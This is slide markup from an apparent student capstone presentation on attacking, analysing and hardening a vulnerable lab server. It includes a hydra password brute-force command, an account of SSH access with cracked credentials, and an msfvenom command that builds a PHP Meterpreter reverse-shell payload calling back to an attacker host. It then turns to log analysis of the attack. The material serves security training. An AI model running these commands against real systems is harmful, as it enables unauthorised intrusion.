            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2048599" y="496138"/>
            <a:ext cx="5046801" cy="4151226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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51. Take a Break 1">
  <p:cSld name="CUSTOM_9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1056"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057" name="Google Shape;1057;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607775" y="4957200"/>
            <a:ext cx="261900" cy="105600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:buNone/>
              <a:defRPr sz="600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42900" y="-24125"/>
            <a:ext cx="9229800" cy="5191749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>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slideLayout" Target="../slideLayouts/slideLayout58.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme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52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout63.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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout59.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.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49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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 id="2147483684" r:id="rId26"/>
    <p:sldLayoutId id="2147483685" r:id="rId27"/>
    <p:sldLayoutId id="2147483686" r:id="rId28"/>
    <p:sldLayoutId id="2147483687" r:id="rId29"/>
    <p:sldLayoutId id="2147483688" r:id="rId30"/>
    <p:sldLayoutId id="2147483689" r:id="rId31"/>
    <p:sldLayoutId id="2147483690" r:id="rId32"/>
    <p:sldLayoutId id="2147483691" r:id="rId33"/>
    <p:sldLayoutId id="2147483692" r:id="rId34"/>
    <p:sldLayoutId id="2147483693" r:id="rId35"/>
    <p:sldLayoutId id="2147483694" r:id="rId36"/>
    <p:sldLayoutId id="2147483695" r:id="rId37"/>
    <p:sldLayoutId id="2147483696" r:id="rId38"/>
    <p:sldLayoutId id="2147483697" r:id="rId39"/>
    <p:sldLayoutId id="2147483698" r:id="rId40"/>
    <p:sldLayoutId id="2147483699" r:id="rId41"/>
    <p:sldLayoutId id="2147483700" r:id="rId42"/>
    <p:sldLayoutId id="2147483701" r:id="rId43"/>
    <p:sldLayoutId id="2147483702" r:id="rId44"/>
    <p:sldLayoutId id="2147483703" r:id="rId45"/>
    <p:sldLayoutId id="2147483704" r:id="rId46"/>
    <p:sldLayoutId id="2147483705" r:id="rId47"/>
    <p:sldLayoutId id="2147483706" r:id="rId48"/>
    <p:sldLayoutId id="2147483707" r:id="rId49"/>
    <p:sldLayoutId id="2147483708" r:id="rId50"/>
    <p:sldLayoutId id="2147483709" r:id="rId51"/>
    <p:sldLayoutId id="2147483710" r:id="rId52"/>
  </p:sldLayoutIdLst>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="400">
        <p:fade thruBlk="1"/>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18.xml"/><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18.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8.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18.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18.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/></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1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8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/></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8.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62"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1063" name="Google Shape;1063;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="649600"/>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Capstone Engagement</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Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</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Submitted by:</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Jack Lawton, Eric Troutman, Colin Clark, Leslie Kahler, Mekete Sugebo</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1064" name="Google Shape;1064;p66"/>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sz="500">
                <a:solidFill>
                  <a:srgbClr val="19124F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>I am Jack's Colon. I get cancer. I kill Jack.</a:t>
            </a:r>
            <a:endParaRPr sz="1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74"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p7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HYDRA BRUTE FORCE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="Google Shape;1176;p75"/>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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;1177;p7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78" name="Google Shape;1178;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3581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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400225" y="1250800"/>
            <a:ext cx="8343900" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2317775" y="2054849"/>
            <a:ext cx="4419600" cy="275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84"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1185" name="Google Shape;1185;p7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SSH Login benefits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p7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87" name="Google Shape;1187;p76"/>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76"/>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We were also to use the usernames and passwords to gain ssh access to the server as well, gaining the account privileges of both Ashton and Ryan.	</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89" name="Google Shape;1189;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1190" name="Google Shape;1190;p76"/>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91" name="Google Shape;1191;p76"/>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 name="Google Shape;1192;p76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4572006" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1193" name="Google Shape;1193;p76"/>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94" name="Google Shape;1194;p76"/>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 name="Google Shape;1195;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="48059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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711475" y="148057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With these usernames and passwords we obtained we were able to get access to the webserver via ssh.  We could have exploited this access with a different payload as well.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Robot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00"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201;p7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Successful ssh login</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202" name="Google Shape;1202;p7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203" name="Google Shape;1203;p7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04" name="Google Shape;1204;p77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3581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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1205" name="Google Shape;1205;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1915411"/>
            <a:ext cx="9144000" cy="131267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09"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1210" name="Google Shape;1210;p7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Reverse TCP Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;p78"/>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12" name="Google Shape;1212;p78"/>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78"/>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After accessing the secret folder there was a vulnerability discovered that allowed us to access the /webdav/ folder using ryan’s account.  From here we were able to build a payload and upload it to /webdav/</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214" name="Google Shape;1214;p78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1215" name="Google Shape;1215;p78"/>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216" name="Google Shape;1216;p78"/>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7" name="Google Shape;1217;p78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1218" name="Google Shape;1218;p78"/>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219" name="Google Shape;1219;p78"/>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0" name="Google Shape;1220;p78"/>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78"/>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Using the crafted payload, we were able to use the metasploit framework to bind a reverse php shell to the target machine where we ran the payload to gain shell access and find our target file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p78"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1223" name="Google Shape;1223;p78"/>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224" name="Google Shape;1224;p78"/>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25" name="Google Shape;1225;p78"/>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78"/>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Using the command msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4443 -f raw -o driver.php we uploaded this file into the /webdav/ folder</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1227" name="Google Shape;1227;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="3625025"/>
            <a:ext cx="5200276" cy="865125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6872070" y="3505125"/>
            <a:ext cx="1618679" cy="11049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7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MSFVenom/Meterpreter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;p79"/>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235" name="Google Shape;1235;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2900625" y="1417225"/>
            <a:ext cx="6206125" cy="3543074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2900625" y="626676"/>
            <a:ext cx="4552950" cy="829125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192800" y="843600"/>
            <a:ext cx="27765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Since we had access to the /webdav/ folder we were able to execute our payload and gain shell access to access the target machine.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41"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p80"/>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243" name="Google Shape;1243;p80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="888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Log Analysis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Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p8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15</a:t>
            </a:fld>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48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249" name="Google Shape;1249;p8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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250;p81"/>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251" name="Google Shape;1251;p8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52" name="Google Shape;1252;p81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712025" y="675975"/>
            <a:ext cx="49110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What time did the port scan occur?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>How many packets were sent, and from which IP?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>What indicates that this was a port scan?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
